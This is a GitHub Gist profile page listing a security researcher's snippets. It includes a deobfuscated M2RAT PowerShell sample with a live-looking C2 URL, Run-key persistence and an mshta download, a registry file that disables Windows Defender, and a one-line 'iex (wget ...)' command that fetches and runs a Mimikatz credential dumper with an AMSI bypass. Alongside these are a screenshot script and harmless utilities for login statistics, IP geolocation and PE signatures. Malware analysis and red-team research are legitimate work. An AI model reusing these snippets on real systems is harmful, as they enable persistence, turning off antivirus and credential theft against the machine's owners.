Skip to content

Instantly share code, notes, and snippets.

View full-sized avatar

Sh1n0g1 Sh1n0g1

View GitHub Profile
@Sh1n0g1
Sh1n0g1 / M2RAT.ps1
Last active September 25, 2023 06:03
View M2RAT.ps1
# Deobfuscated M2RAT
# Refer: https://asec.ahnlab.com/en/56857/
Start-Sleep -Seconds 68;
$buffer = 1024 * 1024;
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
if (!(Test-Path$TEMPORARY_FILE)) {
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
}
@Sh1n0g1
Sh1n0g1 / shodan-query.ipynb
Last active July 21, 2023 04:52
Shodan Query.ipynb
View shodan-query.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@Sh1n0g1
Sh1n0g1 / youtube-summarizer-with-langchain-chatgpt.ipynb
Last active May 25, 2023 04:15
youtube-summarizer-with-langchain-chatgpt.ipynb
View youtube-summarizer-with-langchain-chatgpt.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@Sh1n0g1
Sh1n0g1 / shinolang.ipynb
Created May 20, 2023 01:29
ShinoLang.ipynb
View shinolang.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View DisableWindowsDefender2022.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"DisableRealtimeMonitoring"=dword:00000001
"DisableAntiVirus"=dword:00000001
"DisableSpecialRunningModes"=dword:00000001
"DisableRoutinelyTakingAction"=dword:00000001
"ServiceKeepAlive"=dword:00000000
@Sh1n0g1
Sh1n0g1 / Invoke-OneShot-Mimikatz.ps1
Last active August 12, 2022 08:08 — forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
View Invoke-OneShot-Mimikatz.ps1
# Confirm it works in Windows 10 2022
# Dont download this but execute the next line in command prompt(cmd.exe)
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content
# You will get creds
#
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
# https://payatu.com/blog/arun.nair/amsi-bypass
$code = @"
using System;
@Sh1n0g1
Sh1n0g1 / ScreenShot.ps1
Created January 10, 2017 01:27
Take a screenshot by powershell
View ScreenShot.ps1
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save($path)
$graphics.Dispose()
@Sh1n0g1
Sh1n0g1 / Get-ActiveTime.ps1
Created August 25, 2017 12:55
Get the active time from Eventlog, login event.
View Get-ActiveTime.ps1
#Initialize
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
$LoginData=@{}
ForEach($w in $Weekday){
$LoginData[$w]=@{}
0..23 | % {$LoginData[$w][$_]=0}
}
#Get the data from Eventlog
$i=0
@Sh1n0g1
Sh1n0g1 / ip2geo.py
Created December 21, 2016 01:02
IP2geolocation
View ip2geo.py
#Bulk IP Address 2 Geolocation Using freegeoip.net
#Input: IP Address List
#Output: IP, Latitude, Longitude (CSV Format)
import urllib, json
#Paste your ipaddress list
ips="""
@Sh1n0g1
Sh1n0g1 / pefile_peid.py
Created January 25, 2017 11:32
Get the matching result of UserDB.txt(PEid) using pefile
View pefile_peid.py
import sys
import peutils
import pefile
try:
pe = pefile.PE(sys.argv[1])
signatures = peutils.SignatureDatabase('./sig/userdb.txt')
matches = signatures.match_all(pe, ep_only = True)
if type(matches) is list:
for m in matches: